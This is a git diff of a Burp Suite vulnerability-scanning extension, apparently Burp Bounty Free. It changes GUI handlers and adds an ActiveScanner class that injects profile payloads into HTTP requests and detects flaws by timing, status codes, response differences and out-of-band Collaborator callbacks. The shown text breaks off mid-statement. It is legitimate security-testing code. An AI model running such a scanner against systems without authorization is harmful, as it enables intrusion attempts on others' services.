{//GEN-FIRST:event_invariationsRadioinvariations + if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { + setEnabledVariations(false); + } else if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(true); } - }//GEN-LAST:event_button10removeAllGrep + }//GEN-LAST:event_invariationsRadioinvariations - private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button7pasteGrep - String element = getClipboardContents(); - List lines = Arrays.asList(element.split("\n")); - showGreps(lines); - }//GEN-LAST:event_button7pasteGrep + private void variationsRadiovariations(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_variationsRadiovariations + if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { + setEnabledVariations(false); + } else if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(true); + } + }//GEN-LAST:event_variationsRadiovariations - private void button21addGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button21addGrep - modelgrep.addRow(new Object[]{true, "Or", "Value"}); - }//GEN-LAST:event_button21addGrep + private void radioclActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_radioclActionPerformed + // TODO add your handling code here: + }//GEN-LAST:event_radioclActionPerformed - private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button8loadGrep - loadGrepsFile(modelgrep); - }//GEN-LAST:event_button8loadGrep + private void radioclSelect(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radioclSelect + if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(false); + } else if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { + setEnabledVariations(true); + } + }//GEN-LAST:event_radioclSelect + + private void radiotimeTimeoutSelect(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radiotimeTimeoutSelect + if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(false); + } else if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) { + setEnabledVariations(true); + } + }//GEN-LAST:event_radiotimeTimeoutSelect + + private void radio22payloadencodeMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio22payloadencodeMatchType + if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(false); + } + }//GEN-LAST:event_radio22payloadencodeMatchType + + private void radio3regexMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio3regexMatchType + if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(false); + } + }//GEN-LAST:event_radio3regexMatchType + + private void radio4stringMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio4stringMatchType + if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(false); + } + }//GEN-LAST:event_radio4stringMatchType + + private void radio12payloadMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio12payloadMatchType + if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) { + setEnabledVariations(false); + } + }//GEN-LAST:event_radio12payloadMatchType // Variables declaration - do not modify//GEN-BEGIN:variables @@ -2278,18 +2455,19 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JButton button6; private javax.swing.JButton button7; private javax.swing.JButton button8; - private javax.swing.ButtonGroup buttonGroup1; - private javax.swing.ButtonGroup buttonGroup2; - private javax.swing.ButtonGroup buttonGroup3; - private javax.swing.ButtonGroup buttonGroup4; - private javax.swing.ButtonGroup buttonGroup5; - private javax.swing.ButtonGroup buttonGroup6; + public javax.swing.ButtonGroup buttonGroup1; + public javax.swing.ButtonGroup buttonGroup2; + public javax.swing.ButtonGroup buttonGroup3; + public javax.swing.ButtonGroup buttonGroup4; + public javax.swing.ButtonGroup buttonGroup5; + public javax.swing.ButtonGroup buttonGroup6; public javax.swing.JCheckBox button_submit_labels; public javax.swing.JCheckBox canonical_link; public javax.swing.JCheckBox check1; public javax.swing.JCheckBox check4; public javax.swing.JCheckBox check71; public javax.swing.JCheckBox check72; + public javax.swing.JCheckBox check73; public javax.swing.JCheckBox check8; public javax.swing.JComboBox combo2; public javax.swing.JCheckBox comments; @@ -2309,6 +2487,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JCheckBox initial_body_content; public javax.swing.JCheckBox input_image_labels; public javax.swing.JCheckBox input_submit_labels; + public javax.swing.JRadioButton insert; public javax.swing.JRadioButton invariationsRadio; private javax.swing.JButton jButton6; private javax.swing.JButton jButton7; @@ -2327,6 +2506,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JLabel jLabel19; private javax.swing.JLabel jLabel2; private javax.swing.JLabel jLabel20; + private javax.swing.JLabel jLabel21; private javax.swing.JLabel jLabel22; private javax.swing.JLabel jLabel23; private javax.swing.JLabel jLabel24; @@ -2360,8 +2540,9 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JLabel jLabel6; private javax.swing.JLabel jLabel7; private javax.swing.JLabel jLabel9; + private javax.swing.JPanel jPanel1; public javax.swing.JPanel jPanel10; - private javax.swing.JPanel jPanel11; + public javax.swing.JPanel jPanel11; private javax.swing.JPanel jPanel12; private javax.swing.JPanel jPanel3; private javax.swing.JScrollPane jScrollPane1; @@ -2369,7 +2550,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JScrollPane jScrollPane11; private javax.swing.JScrollPane jScrollPane14; private javax.swing.JScrollPane jScrollPane15; - private javax.swing.JScrollPane jScrollPane3; + private javax.swing.JScrollPane jScrollPane16; private javax.swing.JScrollPane jScrollPane4; private javax.swing.JScrollPane jScrollPane5; private javax.swing.JScrollPane jScrollPane6; @@ -2378,7 +2559,6 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JScrollPane jScrollPane9; private javax.swing.JSeparator jSeparator10; private javax.swing.JSeparator jSeparator11; - private javax.swing.JSeparator jSeparator12; private javax.swing.JSeparator jSeparator2; private javax.swing.JSeparator jSeparator3; private javax.swing.JSeparator jSeparator4; @@ -2390,12 +2570,12 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JCheckBox last_modified_header; public javax.swing.JCheckBox limited_body_content; public javax.swing.JCheckBox line_count; - public javax.swing.JList list1; public javax.swing.JList list3; public javax.swing.JList listtag; public javax.swing.JCheckBox location; public javax.swing.JCheckBox negativeCT; public javax.swing.JCheckBox negativeRC; + public javax.swing.JCheckBox negativeURL; public javax.swing.JComboBox newTagCombo; private javax.swing.JButton newTagb; public javax.swing.JCheckBox non_hidden_form_input_types; @@ -2425,6 +2605,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JRadioButton radio8; public javax.swing.JRadioButton radio9; public javax.swing.JRadioButton radiocl; + public javax.swing.JRadioButton radiohttp; public javax.swing.JRadioButton radiotime; public javax.swing.JRadioButton rb1; public javax.swing.JRadioButton rb2; @@ -2432,11 +2613,13 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JRadioButton rb4; private javax.swing.JButton removetag; public javax.swing.JRadioButton replace; + public javax.swing.JTextField resposecode; public javax.swing.JCheckBox set_cookie_names; public javax.swing.JSpinner sp1; public javax.swing.JCheckBox status_code; public javax.swing.JTable table4; public javax.swing.JTable table5; + public javax.swing.JTable table6; public javax.swing.JCheckBox tag_ids; public javax.swing.JCheckBox tag_names; public javax.swing.JTextField text1; @@ -2444,16 +2627,17 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JTextField text5; public javax.swing.JTextField text71; public javax.swing.JTextField text72; + public javax.swing.JTextField text73; public javax.swing.JTextArea textarea1; public javax.swing.JTextArea textarea2; public javax.swing.JTextArea textarea3; public javax.swing.JTextArea textarea4; public javax.swing.JTextField textauthor; public javax.swing.JTextField textcl; - public javax.swing.JTextField textfield1; public javax.swing.JTextField textgreps; public javax.swing.JTextField textpayloads; - public javax.swing.JTextField texttime; + public javax.swing.JTextField texttime1; + public javax.swing.JTextField texttime2; public javax.swing.JCheckBox unknown; public javax.swing.JCheckBox urlpathfilename; public javax.swing.JCheckBox urlpathfolder; diff --git a/src/ActiveScanner.java b/src/ActiveScanner.java new file mode 100755 index 0000000..6cdb8c5 --- /dev/null +++ b/src/ActiveScanner.java @@ -0,0 +1,914 @@ +/* +Copyright 2018 Eduardo Garcia Melia + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. + */ +package burpbountyfree; + +import burp.IBurpCollaboratorClientContext; +import burp.IBurpExtenderCallbacks; +import burp.IExtensionHelpers; +import burp.IHttpRequestResponse; +import burp.IHttpService; +import burp.IRequestInfo; +import burp.IResponseInfo; +import burp.IResponseVariations; +import burp.IScanIssue; +import burp.IScannerInsertionPoint; +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import java.net.URL; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; +import java.util.UUID; + +/** + * + * @author wagiro + */ +public class ActiveScanner { + + private IBurpExtenderCallbacks callbacks; + private IExtensionHelpers helpers; + + JsonArray active_profiles; + BurpBountyExtension bbe; + Gson gson; + CollaboratorData burpCollaboratorData; + BurpBountyGui bbg; + JsonArray allprofiles; + Integer redirtype; + List rules_done = new ArrayList<>(); + Integer smartscandelay; + Utils utils; + String issuename; + String name; + String issuedetail; + String issuebackground; + String remediationdetail; + String remediationbackground; + String charstourlencode; + int matchtype; + String issueseverity; + String issueconfidence; + boolean excludeHTTP; + boolean onlyHTTP; + boolean notresponse; + boolean iscontenttype; + boolean isresponsecode; + boolean negativect; + boolean negativerc; + String contenttype; + String responsecode; + String httpresponsecode; + boolean casesensitive; + boolean urlencode; + Integer maxredirect; + int payloadposition; + String timeout1; + String timeout2; + String contentLength; + List payloads; + List payloadsEncoded; + List greps; + List encoders; + ProfilesProperties profile_property; + List headers; + List variationAttributes; + List insertionPointType; + String urlextension; + Boolean isurlextension; + Boolean NegativeUrlExtension; + GrepMatch gm; + Boolean passive; + + List responseCodes = new ArrayList<>(Arrays.asList(300, 301, 303, 302, 307, 308)); + int limitredirect = 30; + + public ActiveScanner(BurpBountyExtension bbe, IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData, JsonArray allprofiles, BurpBountyGui bbg) { + + this.callbacks = callbacks; + helpers = callbacks.getHelpers(); + this.burpCollaboratorData = burpCollaboratorData; + this.allprofiles = allprofiles; + this.bbe = bbe; + this.bbg = bbg; + utils = new Utils(bbe, callbacks, burpCollaboratorData, allprofiles, bbg); + gm = new GrepMatch(this.callbacks); + } + + public void runAScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, JsonArray activeprofiles, Boolean come_from_passive, Boolean reqpassive, String rule_name, Boolean passive) { + try { + this.passive = passive; + + Boolean collaborator = true; + IBurpCollaboratorClientContext CollaboratorClientContext2 = null; + gson = new Gson(); + + try { + CollaboratorClientContext2 = callbacks.createBurpCollaboratorClientContext(); + burpCollaboratorData.setCollaboratorClientContext(CollaboratorClientContext2); + } catch (Exception ex) { + System.out.println("ActiveScanner line 115: " + ex.getMessage()); + collaborator = false; + } + + for (int i = 0; i < activeprofiles.size(); i++) { + + Object idata = activeprofiles.get(i); + profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); + + //initialized the profile values + setProfilesValues(profile_property); + if (!come_from_passive && !insertionPointType.contains(insertionPoint.getInsertionPointType() & 0xFF)) { + continue; + + } + if (come_from_passive && !reqpassive) { + Boolean continue_or_not = false; + + for (int ip : insertionPointType) { + if (insertionPoint.getInsertionPointName().endsWith("_" + String.valueOf(ip))) { + continue_or_not = true; + } + } + if (!continue_or_not) { + continue;//COMPROBAR ESTE RETURN + } + } + + //inicializa valores de payload, payloadencode y grep + processPayloads(); + + for (String payload : payloads) { + if (payload.startsWith("false,")) { + continue; + } else if (payload.startsWith("true,")) { + payload = payload.replace("true,", ""); + } + + Thread.sleep(60); + String bchost = ""; + + if (urlencode) { + payload = utils.encodeTheseURL(payload, charstourlencode); + } + + if (payloadposition == 2) { + payload = insertionPoint.getBaseValue().concat(payload); + } + + if (payloadposition == 3) { + payload = insertPayload(insertionPoint.getBaseValue(), payload); + } + + //processHeaders + try { + if (!headers.isEmpty()) { + for (int x = 0; x < headers.size(); x++) { + if (headers.get(x).type.equals("Payload")) { + if (headers.get(x).regex.equals("String")) { + payload = payload.replace(headers.get(x).match, headers.get(x).replace); + } else { + payload = payload.replaceAll(headers.get(x).match, headers.get(x).replace); + } + } + + if (headers.get(x).type.equals("Request") && collaborator) { + if (headers.get(x).regex.equals("String")) { + String a = headers.get(x).replace; + if (headers.get(x).replace.contains("{BC}")) { + bchost = CollaboratorClientContext2.generatePayload(true); + String subdomain = generateString(); + bchost = subdomain + "." + bchost; + } + } + } + } + + } + } catch (Exception ex) { + //escondido porque muestra mucho + bchost = ""; + + } + + if (payload.contains(" ") && utils.encode(insertionPoint, reqpassive)) {//for avoid space in payload + payload = payload.replace(" ", "%20"); + } + + if (matchtype == 5)//Timeout match type + { + timeoutMatchType(baseRequestResponse, insertionPoint, payload, rule_name); + + } else if (matchtype == 7 || matchtype == 8)//Variations match type//Invariation match type + { + variationsInvariationsMatchType(baseRequestResponse, insertionPoint, payload, rule_name); + + } else if (matchtype == 6)//Content Length difference match type + { + contentLengthMatchType(baseRequestResponse, insertionPoint, payload, rule_name); + + } else if (matchtype == 9)//HTTP Response Code + { + httpCodeMatchType(baseRequestResponse, insertionPoint, payload, rule_name); + + } else if (payload.contains("{BC}") && collaborator || !bchost.equals("") && collaborator)//Burp Collaborator + { + CollaboratorMatchType(baseRequestResponse, insertionPoint, payload, bchost, rule_name, CollaboratorClientContext2); + + } else {//String, Regex, Payload, Payload without encode match types + stringRegexMatchType(baseRequestResponse, insertionPoint, payload, rule_name,CollaboratorClientContext2,bchost); + } + + } + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 175: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + } + + public static String insertPayload(String original, String payload) { + + String bagBegin = original.substring(0, original.length() / 2); + String bagEnd = original.substring(original.length() / 2, original.length()); + return bagBegin + payload + bagEnd; + } + + public void processPayloads() { + //If encoders exist... + if (!encoders.isEmpty()) { + switch (matchtype) { + case 1: + payloadsEncoded = utils.processPayload(payloads, encoders); + payloads = new ArrayList(payloadsEncoded); + break; + case 2: + payloadsEncoded = utils.processPayload(payloads, encoders); + payloads = new ArrayList(payloadsEncoded); + break; + case 3: + payloadsEncoded = utils.processPayload(payloads, encoders); + greps = new ArrayList(); + for (String p : payloads) { + greps.add("true,Or," + p); + } + payloads = payloadsEncoded; + break; + case 4: + greps = new ArrayList(); + payloadsEncoded = utils.processPayload(payloads, encoders); + for (String p : payloads) { + greps.add("true,Or," + p); + } + payloads = new ArrayList(payloadsEncoded); + break; + default: + payloadsEncoded = utils.processPayload(payloads, encoders); + payloads = new ArrayList(payloadsEncoded); + break; + } + + } else { + if (matchtype == 3) { + for (String p : payloads) { + greps.add("true,Or," + p); + } + } + } + } + + public void setProfilesValues(ProfilesProperties profile_property) { + payloads = profile_property.getPayloads(); + name = profile_property.getProfileName(); + greps = profile_property.getGreps(); + issuename = profile_property.getIssueName(); + issueseverity = profile_property.getIssueSeverity(); + issueconfidence = profile_property.getIssueConfidence(); + issuedetail = profile_property.getIssueDetail(); + issuebackground = profile_property.getIssueBackground(); + remediationdetail = profile_property.getRemediationDetail(); + remediationbackground = profile_property.getRemediationBackground(); + matchtype = profile_property.getMatchType(); + notresponse = profile_property.getNotResponse(); + casesensitive = profile_property.getCaseSensitive(); + encoders = profile_property.getEncoder(); + urlencode = profile_property.getUrlEncode(); + charstourlencode = profile_property.getCharsToUrlEncode(); + iscontenttype = profile_property.getIsContentType(); + isresponsecode = profile_property.getIsResponseCode(); + contenttype = profile_property.getContentType(); + responsecode = profile_property.getResponseCode(); + httpresponsecode = profile_property.getHttpResponseCode(); + excludeHTTP = profile_property.getExcludeHTTP(); + onlyHTTP = profile_property.getOnlyHTTP(); + negativect = profile_property.getNegativeCT(); + negativerc = profile_property.getNegativeRC(); + maxredirect = profile_property.getMaxRedir(); + redirtype = profile_property.getRedirection(); + payloadposition = profile_property.getPayloadPosition(); + timeout1 = profile_property.getTime1(); + timeout2 = profile_property.getTime2(); + contentLength = profile_property.getContentLength(); + headers = profile_property.getHeader() != null ? profile_property.getHeader() : new ArrayList(); + variationAttributes = profile_property.getVariationAttributes() != null ? profile_property.getVariationAttributes() : new ArrayList(); + insertionPointType = profile_property.getInsertionPointType() != null ? profile_property.getInsertionPointType() : new ArrayList(Arrays.asList(0)); + isurlextension = profile_property.getIsURLExtension(); + urlextension = profile_property.getURLExtension(); + NegativeUrlExtension = profile_property.getNegativeURLExtension(); + } + + public void timeoutMatchType(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, String payload, String rule_name) { + long startTime, endTime, difference = 0; + try { + Boolean isduplicated = utils.checkDuplicated(baseRequestResponse, issuename, insertionPoint); + + if (!isduplicated) { + IHttpService httpService = baseRequestResponse.getHttpService(); + + startTime = System.currentTimeMillis(); + IHttpRequestResponse payloadRequestResponse; + try { + payloadRequestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, "")); + } catch (Exception e) { + return; + } + if (payloadRequestResponse != null) { + + endTime = System.currentTimeMillis(); + difference = (endTime - startTime); + + IResponseInfo r; + IResponseInfo rbase; + + try { + if (payloadRequestResponse.getResponse() == null || baseRequestResponse.getResponse() == null) { + return; + } + r = helpers.analyzeResponse(payloadRequestResponse.getResponse()); + rbase = helpers.analyzeResponse(baseRequestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 378: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + + Integer responseCode = new Integer(r.getStatusCode()); + Integer responseCodeBase = new Integer(rbase.getStatusCode()); + IRequestInfo requestInfo = helpers.analyzeRequest(payloadRequestResponse); + + if ((!isresponsecode || isresponsecode && utils.isResponseCode(responsecode, negativerc, responseCode) && utils.isResponseCode(responsecode, negativerc, responseCodeBase)) && (!iscontenttype || iscontenttype && utils.isContentType(contenttype, negativect, r))) { + try { + Integer time1 = Integer.parseInt(timeout1); + Integer time2 = Integer.parseInt(timeout2); + if (time2 * 1000 >= difference && difference >= time1 * 1000) { + callbacks.addScanIssue(new CustomScanIssue(payloadRequestResponse.getHttpService(), helpers.analyzeRequest(payloadRequestResponse).getUrl(), + new IHttpRequestResponse[]{callbacks.applyMarkers(payloadRequestResponse, null, null)}, + "BurpBounty - " + issuename, "Vulnerable parameter: " + insertionPoint.getInsertionPointName() + ".
" + issuedetail.replace("", payload), issueseverity, + issueconfidence, remediationdetail.replace("", payload), issuebackground.replace("", payload), + remediationbackground.replace("", payload))); + return; + } + } catch (NumberFormatException e) { + + } + } + } + + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 410: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + } + + public void httpCodeMatchType(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, String payload, String rule_name) { + + try { + Boolean isduplicated = utils.checkDuplicated(baseRequestResponse, issuename, insertionPoint); + + if (!isduplicated) { + IHttpService httpService = baseRequestResponse.getHttpService(); + + IHttpRequestResponse payloadRequestResponse; + try { + payloadRequestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, "")); + } catch (Exception e) { + return; + } + + if (payloadRequestResponse != null) { + IResponseInfo r; + try { + if (payloadRequestResponse.getResponse() == null) { + return; + } + r = helpers.analyzeResponse(payloadRequestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 440: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + + Integer responseCode = new Integer(r.getStatusCode()); + IRequestInfo requestInfo = helpers.analyzeRequest(payloadRequestResponse); + + if ((!iscontenttype || iscontenttype && utils.isContentType(contenttype, negativect, r))) { + if (utils.isResponseCode(httpresponsecode, negativerc, responseCode)) { + List responseMarkers = new ArrayList(1); + List requestMarkers = new ArrayList(1); + + requestMarkers.add(new int[]{helpers.bytesToString(payloadRequestResponse.getRequest()).indexOf(payload), + helpers.bytesToString(payloadRequestResponse.getRequest()).indexOf(payload) + payload.length()}); + String grep = "HTTP/"; + responseMarkers.add(new int[]{helpers.bytesToString(payloadRequestResponse.getResponse()).toUpperCase().indexOf(grep) + 9, + helpers.bytesToString(payloadRequestResponse.getResponse()).toUpperCase().indexOf(grep) + 12}); + + callbacks.addScanIssue(new CustomScanIssue(payloadRequestResponse.getHttpService(), helpers.analyzeRequest(payloadRequestResponse).getUrl(), + new IHttpRequestResponse[]{callbacks.applyMarkers(payloadRequestResponse, requestMarkers, responseMarkers)}, + "BurpBounty - " + issuename, "Vulnerable parameter: " + insertionPoint.getInsertionPointName() + ".
" + issuedetail, issueseverity, + issueconfidence, remediationdetail, issuebackground, remediationbackground)); + return; + + } + } + } + + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 475: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + } + + public void variationsInvariationsMatchType(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, String payload, String rule_name) { + + Integer responseCode; + IResponseInfo r; + + try { + Boolean isduplicated = utils.checkDuplicated(baseRequestResponse, issuename, insertionPoint); + + if (!isduplicated) { + IHttpService httpService = baseRequestResponse.getHttpService(); + IHttpRequestResponse requestResponse; + try { + requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, "")); + } catch (Exception e) { + return; + } + if (requestResponse == null) { + return; + } + try { + if (requestResponse.getResponse() == null) { + return; + + } + r = helpers.analyzeResponse(requestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 509: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + + IResponseVariations ipv = helpers.analyzeResponseVariations(baseRequestResponse.getResponse(), requestResponse.getResponse()); + List var; + List var2; + + if (matchtype == 7) { + var = ipv.getVariantAttributes(); + var2 = ipv.getInvariantAttributes(); + } else { + var = ipv.getInvariantAttributes(); + var2 = ipv.getVariantAttributes(); + } + + List requestMarkers = new ArrayList(); + byte[] request; + try { + request = requestResponse.getRequest(); + } catch (Exception e) { + return; + } + responseCode = new Integer(r.getStatusCode()); + IRequestInfo requestInfo = helpers.analyzeRequest(requestResponse); + + if ((!isresponsecode || isresponsecode && utils.isResponseCode(responsecode, negativerc, responseCode)) && (!iscontenttype || iscontenttype && utils.isContentType(contenttype, negativect, r))) { + if (var.containsAll(variationAttributes) && !var2.containsAll(variationAttributes)) { + int start = 0; + byte[] match = helpers.stringToBytes(payload); + int end = 0; + while (start < request.length) { + end = end + 1; + if (end == 30) { + break; + } + start = helpers.indexOf(request, match, false, start, request.length); + if (start == -1) { + break; + } + requestMarkers.add(new int[]{start, start + match.length}); + start += match.length; + } + callbacks.addScanIssue(new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), + new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)}, + "BurpBounty - " + issuename, "Vulnerable parameter: " + insertionPoint.getInsertionPointName() + ".
" + issuedetail.replace("", helpers.urlEncode(payload)), issueseverity, + issueconfidence, remediationdetail.replace("", helpers.urlEncode(payload)), issuebackground.replace("", helpers.urlEncode(payload)), + remediationbackground.replace("", helpers.urlEncode(payload)))); + return; + + } + } + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 566: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + + } + + public void contentLengthMatchType(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, String payload, String rule_name) { + + try { + Boolean isduplicated = utils.checkDuplicated(baseRequestResponse, issuename, insertionPoint); + + if (!isduplicated) { + + IHttpService httpService = baseRequestResponse.getHttpService(); + IHttpRequestResponse requestResponse; + try { + requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, "")); + } catch (Exception e) { + return; + } + if (requestResponse == null) { + return; + } + IResponseInfo r; + IResponseInfo rbase; + + try { + r = helpers.analyzeResponse(requestResponse.getResponse()); + rbase = helpers.analyzeResponse(baseRequestResponse.getResponse()); + } catch (Exception e) { + return; + } + + try { + if (requestResponse.getResponse() == null || baseRequestResponse.getResponse() == null) { + return; + } + r = helpers.analyzeResponse(requestResponse.getResponse()); + rbase = helpers.analyzeResponse(baseRequestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 608: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + + Integer responseCode = new Integer(r.getStatusCode()); + Integer responseCodeBase = new Integer(rbase.getStatusCode()); + IRequestInfo requestInfo = helpers.analyzeRequest(requestResponse); + + if ((!isresponsecode || isresponsecode && utils.isResponseCode(responsecode, negativerc, responseCode) && utils.isResponseCode(responsecode, negativerc, responseCodeBase)) && (!iscontenttype || iscontenttype && utils.isContentType(contenttype, negativect, r))) { + int baseResponseContentLength = utils.getContentLength(baseRequestResponse); + int currentResponseContentLength = utils.getContentLength(requestResponse); + + if (Math.abs(baseResponseContentLength - currentResponseContentLength) > Integer.parseInt(contentLength)) { + List responseMarkers = new ArrayList(1); + String grep = "CONTENT-LENGTH:"; + responseMarkers.add(new int[]{helpers.bytesToString(requestResponse.getResponse()).toUpperCase().indexOf(grep), + helpers.bytesToString(requestResponse.getResponse()).toUpperCase().indexOf(grep) + grep.length()}); + + callbacks.addScanIssue(new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), + new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, null, responseMarkers)}, + "BurpBounty - " + issuename, "Vulnerable parameter: " + insertionPoint.getInsertionPointName() + ".
" + issuedetail.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)), issueseverity, + issueconfidence, remediationdetail.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)), issuebackground.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)), + remediationbackground.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)))); + return; + } + } + + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 502: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + + } + + public void CollaboratorMatchType(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, String payload, String bchost, String rule_name, IBurpCollaboratorClientContext CollaboratorClientContext2) { + + int loop = 0; + Boolean redirect = true; + try { + if (bchost.isEmpty()) { + bchost = CollaboratorClientContext2.generatePayload(true); + String subdomain = generateString(); + bchost = subdomain + "." + bchost; + } + } catch (Exception ex) { + return; + } + + try { + + Boolean isduplicated = utils.checkDuplicated(baseRequestResponse, issuename, insertionPoint); + + if (!isduplicated) { + IHttpService httpService = baseRequestResponse.getHttpService(); + + payload = payload.replace("{BC}", bchost); + IHttpRequestResponse requestResponse; + try { + requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); + } catch (Exception e) { + return; + } + if (requestResponse == null) { + return; + } + + IResponseInfo r; + + try { + if (requestResponse.getResponse() == null) { + return; + } + r = helpers.analyzeResponse(requestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 685: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + + burpCollaboratorData.setIssueProperties(requestResponse, bchost, issuename, issuedetail.replace("", helpers.urlEncode(payload)), issueseverity.replace("", helpers.urlEncode(payload)), issueconfidence.replace("", (payload)), remediationdetail.replace("", (payload)), issuebackground.replace("", (payload)), remediationbackground.replace("", (payload))); + Integer responseCode = new Integer(r.getStatusCode()); + + do { + if (responseCodes.contains(responseCode) && loop < limitredirect) { + httpService = requestResponse.getHttpService(); + URL url = null; + try { + url = utils.getRedirection(requestResponse, httpService, redirtype); + } catch (NullPointerException e) { + redirect = false; + } + + if (url != null) { + try { + byte[] checkRequest = helpers.buildHttpRequest(url); + checkRequest = utils.getMatchAndReplace(headers, checkRequest, payload, bchost); + + int port = 0; + + if (url.getPort() == -1) { + port = url.getDefaultPort(); + } + + IHttpService newrequest = helpers.buildHttpService(url.getHost(), port, url.getProtocol()); + + requestResponse = callbacks.makeHttpRequest(newrequest, checkRequest); + } catch (Exception e) { + return; + } + if (requestResponse == null) { + return; + } + + try { + if (requestResponse.getResponse() == null) { + return; + } + r = helpers.analyzeResponse(requestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 735: " 